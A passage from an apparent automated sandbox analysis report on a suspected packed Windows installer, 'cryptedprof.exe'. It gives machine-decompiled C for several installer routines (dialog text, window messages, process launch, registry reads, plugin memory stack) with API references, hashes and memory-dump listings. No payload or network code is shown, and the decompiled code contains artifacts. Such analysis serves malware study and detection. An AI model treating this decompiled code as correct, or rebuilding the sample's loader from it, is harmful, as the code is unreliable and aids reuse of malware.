				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}



















                                                                                        0x00404b20
                                                                                        0x00404b25
                                                                                        0x00404b2d
                                                                                        0x00404b2e
                                                                                        0x00404b3b
                                                                                        0x00404b43
                                                                                        0x00404b44
                                                                                        0x00404b46
                                                                                        0x00404b48
                                                                                        0x00404b4a
                                                                                        0x00404b4d
                                                                                        0x00404b4d
                                                                                        0x00404b54
                                                                                        0x00404b5a
                                                                                        0x00404b5a
                                                                                        0x00404b61
                                                                                        0x00404b68
                                                                                        0x00404b6b
                                                                                        0x00404b6e
                                                                                        0x00404b6e
                                                                                        0x00404b72
                                                                                        0x00404b82
                                                                                        0x00404b84
                                                                                        0x00404b87
                                                                                        0x00404b30
                                                                                        0x00404b30
                                                                                        0x00404b37
                                                                                        0x00404b37
                                                                                        0x00404b8f
                                                                                        0x00404b9a
                                                                                        0x00404bb0
                                                                                        0x00404bc0
                                                                                        0x00404bdc

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                        • wsprintfA.USER32 ref: 00404BC0
                                                                                        • SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s
                                                                                        • API String ID: 3540041739-3551169577
                                                                                        • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                        • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                        • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                        • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                        0x00401c2e
                                                                                        0x00401c30
                                                                                        0x00401c37
                                                                                        0x00401c3a
                                                                                        0x00401c3d
                                                                                        0x00401c47
                                                                                        0x00401c4b
                                                                                        0x00401c4e
                                                                                        0x00401c57
                                                                                        0x00401c57
                                                                                        0x00401c5a
                                                                                        0x00401c5e
                                                                                        0x00401c67
                                                                                        0x00401c67
                                                                                        0x00401c6a
                                                                                        0x00401c6e
                                                                                        0x00401c70
                                                                                        0x00401cc5
                                                                                        0x00401cc7
                                                                                        0x00401cd0
                                                                                        0x00401cd8
                                                                                        0x00401cdb
                                                                                        0x00401cdb
                                                                                        0x00401ce4
                                                                                        0x00000000
                                                                                        0x00401c72
                                                                                        0x00401c79
                                                                                        0x00401c7b
                                                                                        0x00401c7e
                                                                                        0x00401c84
                                                                                        0x00401c8b
                                                                                        0x00401c8e
                                                                                        0x00401cb6
                                                                                        0x00401cea
                                                                                        0x00401cea
                                                                                        0x00401c90
                                                                                        0x00401c9e
                                                                                        0x00401ca6
                                                                                        0x00401ca9
                                                                                        0x00401ca9
                                                                                        0x00401c8e
                                                                                        0x00401ced
                                                                                        0x00401cf0
                                                                                        0x00401cf6
                                                                                        0x004029a5
                                                                                        0x004029a5
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                        • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                        • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                        • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                        0x00405be6
                                                                                        0x00405bfd
                                                                                        0x00405c05
                                                                                        0x00405c05
                                                                                        0x00405c0d

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-3936084776
                                                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                        • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                        • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2c8
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2a8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\engineer\\AppData\\Local\\Temp\\nsl227.tmp", 7);
			}






                                                                                        0x0040396e
                                                                                        0x0040397d
                                                                                        0x00403980
                                                                                        0x00403982
                                                                                        0x00403982
                                                                                        0x00403989
                                                                                        0x00403991
                                                                                        0x00403994
                                                                                        0x00403996
                                                                                        0x00403996
                                                                                        0x00403996
                                                                                        0x0040399d
                                                                                        0x004039af

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                        • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsl227.tmp, xrefs: 004039A4
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl227.tmp
                                                                                        • API String ID: 2962429428-1875756518
                                                                                        • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                        • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                        • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                        • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 89%
                                                                                        			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}





                                                                                        0x004052ec
                                                                                        0x004052f6
                                                                                        0x00405312
                                                                                        0x00405334
                                                                                        0x00405337
                                                                                        0x0040533d
                                                                                        0x00405347
                                                                                        0x00405348
                                                                                        0x0040534a
                                                                                        0x00405350
                                                                                        0x00405350
                                                                                        0x0040535a
                                                                                        0x00000000
                                                                                        0x00405368
                                                                                        0x0040531f
                                                                                        0x00405357
                                                                                        0x00405357
                                                                                        0x00000000
                                                                                        0x00405357
                                                                                        0x0040532b
                                                                                        0x0040532d
                                                                                        0x00000000
                                                                                        0x0040532d
                                                                                        0x004052fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405303
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00405317
                                                                                        • CallWindowProcA.USER32 ref: 00405368
                                                                                          • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                        • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                        • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                        • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                        0x00406142
                                                                                        0x00406144
                                                                                        0x0040615c
                                                                                        0x00406161
                                                                                        0x00406166
                                                                                        0x004061a3
                                                                                        0x004061a3
                                                                                        0x00406168
                                                                                        0x0040617a
                                                                                        0x00406185
                                                                                        0x0040618b
                                                                                        0x00406195
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406195
                                                                                        0x004061a8

                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                        • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID: Call
                                                                                        • API String ID: 3356406503-1824292864
                                                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                        • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                        • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                        0x004058f5
                                                                                        0x00405915
                                                                                        0x0040591d
                                                                                        0x00405922
                                                                                        0x00000000
                                                                                        0x00405928
                                                                                        0x0040592c

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 004058FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                        • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                                        • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                        • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                        0x00405c2d
                                                                                        0x00405c37
                                                                                        0x00405c39
                                                                                        0x00405c40
                                                                                        0x00405c48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c48
                                                                                        0x00405c4a
                                                                                        0x00405c4f

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405C32
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405C40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-3125694417
                                                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                        • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                        • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 709910E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E709910E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7099405c = _a8;
				 *0x70994060 = _a16;
				 *0x70994064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70994038, E70991556, _t52);
				_t43 =  *0x7099405c +  *0x7099405c * 4 << 2;
				_t17 = E7099123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E70991266(E709912AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E709912D1( *_t55 - 0x30, E7099123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x70994030;
								 *0x70994030 = _t31;
								E70991508(_t31 + 4,  *0x70994064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x70994030;
							if( *0x70994030 != 0) {
								E70991508( *0x70994064, _t34 + 4, _t43);
								_t37 =  *0x70994030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x70994030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
